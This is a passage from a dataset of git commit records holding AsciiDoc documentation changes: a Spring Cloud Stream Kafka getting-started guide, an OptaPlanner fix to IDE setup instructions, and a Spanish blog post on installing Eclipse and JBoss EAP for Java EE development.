Spring Cloud Stream samples, please refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n== Getting Started\n\nTo get started with creating Spring Cloud Stream applications, visit the https:\/\/start.spring.io[Spring Initializr] and create a new Maven project named \"GreetingSource\".\nSelect Spring Boot version 1.3.4 SNAPSHOT and search or tick the checkbox for Stream Kafka (we will be using Kafka for messaging).\n\nNext, create a new class, `GreetingSource`, in the same package as the `GreetingSourceApplication` class.\nGive it the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.messaging.Source;\nimport org.springframework.integration.annotation.InboundChannelAdapter;\n\n@EnableBinding(Source.class)\npublic class GreetingSource {\n\n @InboundChannelAdapter(Source.OUTPUT)\n public String greet() {\n return \"hello world \" + System.currentTimeMillis();\n }\n}\n----\n\nThe `@EnableBinding` annotation is what triggers the creation of Spring Integration infrastructure components.\nSpecifically, it will create a Kafka connection factory, a Kafka outbound channel adapter, and the message channel defined inside the Source interface:\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\nThe auto-configuration also creates a default poller, so that the `greet()` method will be invoked once per second.\nThe standard Spring Integration `@InboundChannelAdapter` annotation sends a message to the source's output channel, using the return value as the payload of the message.\n\nTo test-drive this setup, run a Kafka message broker.\nAn easy way to do this is to use a Docker image:\n\n[source]\n----\n# On OS X\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \\`docker-machine active\\`` --env ADVERTISED_PORT=9092 spotify\/kafka\n\n# On Linux\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=localhost --env ADVERTISED_PORT=9092 spotify\/kafka\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nThe consumer application is coded in a similar manner.\nGo back to Initializr and create another project, named LoggingSink.\nThen create a new class, `LoggingSink`, in the same package as the class `LoggingSinkApplication` and with the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.annotation.StreamListener;\nimport org.springframework.cloud.stream.messaging.Sink;\n\n@EnableBinding(Sink.class)\npublic class LoggingSink {\n\n @StreamListener(Sink.INPUT)\n public void log(String message) {\n System.out.println(message);\n }\n}\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nTo connect the GreetingSource application to the LoggingSink application, each application must share the same destination name.\nStarting up both applications as shown below, you will see the consumer application printing \"hello world\" and a timestamp to the console:\n\n[source]\n----\ncd GreetingSource\njava -jar target\/GreetingSource-0.0.1-SNAPSHOT.jar --spring.cloud.stream.bindings.output.destination=mydest\n\ncd LoggingSink\njava -jar target\/LoggingSink-0.0.1-SNAPSHOT.jar --server.port=8090 --spring.cloud.stream.bindings.input.destination=mydest\n----\n\n(The different server port prevents collisions of the HTTP port used to service the Spring Boot Actuator endpoints in the two applications.)\n\nThe output of the LoggingSink application will look something like the following:\n\n[source]\n----\n[ main] s.b.c.e.t.TomcatEmbeddedServletContainer : Tomcat started on port(s): 8090 (http)\n[ main] com.example.LoggingSinkApplication : Started LoggingSinkApplication in 6.828 seconds (JVM running for 7.371)\nhello world 1458595076731\nhello world 1458595077732\nhello world 1458595078733\nhello world 1458595079734\nhello world 1458595080735\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4bc4a46fa5282e61711ccbfc1a7bf39f796af638","subject":"Fix minor issues in IDE configuration instructions","message":"Fix minor issues in IDE configuration instructions\n","repos":"tkobayas\/optaplanner,baldimir\/optaplanner,baldimir\/optaplanner,baldimir\/optaplanner,tkobayas\/optaplanner,baldimir\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner","old_file":"build\/optaplanner-ide-config\/ide-configuration.adoc","new_file":"build\/optaplanner-ide-config\/ide-configuration.adoc","new_contents":"= IDE Setup Instructions\n\nBefore you start contributing, please follow the instructions below to set up a code style for an IDE of your choice.\n\n== Eclipse Setup\n\nOpen the _Preferences_ window, and then navigate to _Java -> Code Style -> Formatter_.\nClick _Import_ and then select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml` file in the `ide-configuration` directory.\n\nNext navigate to _Java -> Code Style -> Organize Imports_.\nClick Import and select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse.importorder` file.\n\n== IDEA Setup\n\nOpen the _Preferences_ window (or _Settings_ depending on your edition), navigate to Plugins and install the https:\/\/plugins.jetbrains.com\/plugin\/6546-eclipse-code-formatter[Eclipse Code Formatter Plugin] from the Marketplace.\n\nRestart your IDE, open the _Preferences_ (or _Settings_) window again and navigate to _Other Settings -> Eclipse Code Formatter_.\n\nSelect _Use the Eclipse Code Formatter_, then change the _Eclipse Java Formatter Config File_ to point to the `eclipse-format.xml`\nfile in the `build\/optaplanner-ide-config\/src\/main\/resources\/` directory.\nMake sure the _Optimize Imports_ box is ticked, and select the `eclipse.importorder` file as the import order config file.\n\n== VS Code setup\n. Open the _Extensions_ window (Ctrl+Shift+X) and search for _Language Support for Java(TM) by Red Hat_ and install it.\n. Create settings file for your workspace\n+\n[source,shell]\n----\ncd optaplanner\nmkdir .vscode\ntouch .vscode\/settings.json\n----\n. Put in settings.json the following content:\n+\n[source,json]\n----\n{\n \"java.format.settings.url\": \"build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml\",\n \"java.completion.importOrder\": [\n \"java\",\n \"javax\",\n \"org\",\n \"com\"\n ]\n}\n----\n\n\n","old_contents":"= IDE Setup Instructions\n\nBefore you start contributing, please follow the instructions below to setup a code style for an IDE of your choice.\n\n== Eclipse Setup\n\nOpen the _Preferences_ window, and then navigate to _Java -> Code Style -> Formatter_.\nClick _Import_ and then select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml` file in the `ide-configuration` directory.\n\nNext navigate to _Java -> Code Style -> Organize Imports_.\nClick Import and select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse.importorder` file.\n\n== IDEA Setup\n\nOpen the _Preferences_ window (or _Settings_ depending on your edition), navigate to Plugins and install the https:\/\/plugins.jetbrains.com\/plugin\/6546-eclipse-code-formatter[Eclipse Code Formatter Plugin] from the Marketplace.\n\nRestart your IDE, open the _Preferences_ (or _Settings_) window again and navigate to _Other Settings -> Eclipse Code Formatter_.\n\nSelect _Use the Eclipse Code Formatter_, then change the _Eclipse Java Formatter Config File_ to point to the `eclipse-format.xml`\nfile in the `build\/optaplanner-ide-config\/src\/main\/resources\/` directory.\nMake sure the _Optimize Imports_ box is ticked, and select the `eclipse.importorder` file as the import order config file.\n\n== VS Code setup\n. Open the _Extentions_ window (Ctrl+Shift+X) and search for _Language Support for Java(TM) by Red Hat_ and install it.\n. Create settings file for your workspace \n+\n----\ncd optaplanner\nmkdir .vscode\ntouch .vscode\/settings.json\n----\n. Put in settings.json the following content:\n\n----\n \"java.format.settings.url\": \"build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml\",\n \"java.completion.importOrder\": [\n \"java\",\n \"javax\",\n \"com\",\n \"org\"\n ]\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff969860558553d37510fc323d1a61040225c6c5","subject":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","message":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_contents":"= Empezando por el principio. Nuestro banco de trabajo. (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParemos el servidor. Como fue arrancado desde una consola de comandos lo paramos cerr\u00e1ndola. Nos vamos a la ventana de la consola y pulsamos `Ctrl + C`. Escribimos `S` si nos pregunta si queremos finalizar el archivo por lotes y escribimos `exit` para cerrar la ventana.\n\nVamos ahora a reemplazar la ventana de comando por nuestro IDE para cargar el proyecto y probarlo. Abrimos Eclipse. Una vez dentro del IDE lo primero que hacemos es asegurarnos de que el JRE que se usar\u00e1 sea el contenido en el JDK instalado y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK, como cualquier herrmienta de desarrollo de este tipo, y no le basta s\u00f3lo con un JRE. Me voy a `Windows > Preferences > Java > Installed JREs` y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig051.png[]\n\nNOTE: Si vamos a experimentar con los ejemplos del servidor en Eclipse es aconsejable comprimir antes la carpeta raiz que los contiene y tener as\u00ed una copia de seguridad que nos permita recuperar el contenido de los ficheros originales cuando lo necesitemos.\n\nEl siguiente paso es importar el proyecto a Eclipse. Me voy a `File > Import > Maven > Existing Maven Projects`. Click en `Next` y luego en `Browse...` localizamos la carpeta del proyecto en `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.En el recuadro `Projects` se seleccionar\u00e1 autom\u00e1ticamente el fichero POM del proyecto. Pulsamos en `Finish` y se nos pregunta si deseamos que nos muestre el cheatsheet que es el conjunto de notas del proyecto, si contestamos afirmativamente luego podemos cerrarlas.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig052.png[]\n\nArrancamos de nuevo el servidor de forma manual desde la ventana de comandos como hicimos antes. Para desplegar el ejemplo importado en el servidor pulsamos bot\u00f3n derecho sobre el proyecto y `Run As\u2026 > Run Configurations > Maven Build`, y creamos una nueva configuraci\u00f3n de arranque rellenando el campo `Goals` con `clean install jboss-as:deploy`. Pulsamos el bot\u00f3n `Apply` y a continuaci\u00f3n el bot\u00f3n `Run` para que Maven realice el ciclo. En la ventana _Consola_ de Eclipse se puede observar la salida de texto del plugin de Maven durante la ejecuci\u00f3n del ciclo de construcci\u00f3n. \n\nComo antes para comprobar que la aplicaci\u00f3n ha sido desplegada de nuevo vamos al navegador y escribimos la URL `http:\/\/localhost:8080\/jboss-helloworld`.\n\nObservemos como se muestra nuestro proyecto dentro de Eclipse. En la perspectiva inicial por defecto mostrada vemos la estructura del proyecto en un recuadro a la izquierda de la pantalla. Aqu\u00ed podemos usar tres views de Eclipse diferentes: Package Explorer, Project Explorer y Navigator. Esta \u00faltima nos presenta la estructura de directorios del proyecto sin m\u00e1s aderezos y en ocasiones es m\u00e1s limpia y clara. En las otras dos Eclipse aporta informaci\u00f3n adicional en forma de iconos y carpetas extra.\n\nVayamos a la view Package Explorer o a la Proyect Explorer, si no est\u00e1 abierta lo hacemos en `Window > Show Wiew > Other...`, probablemente observaremos que sobre el icono del proyecto hay un icono de Warning. Vayamos a la pesta\u00f1a `Problems` en la parte inferior de la pantalla para ver a que se debe esto.\n\n\n","old_contents":"= Empezando por el principio. Nuestro banco de trabajo. (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins 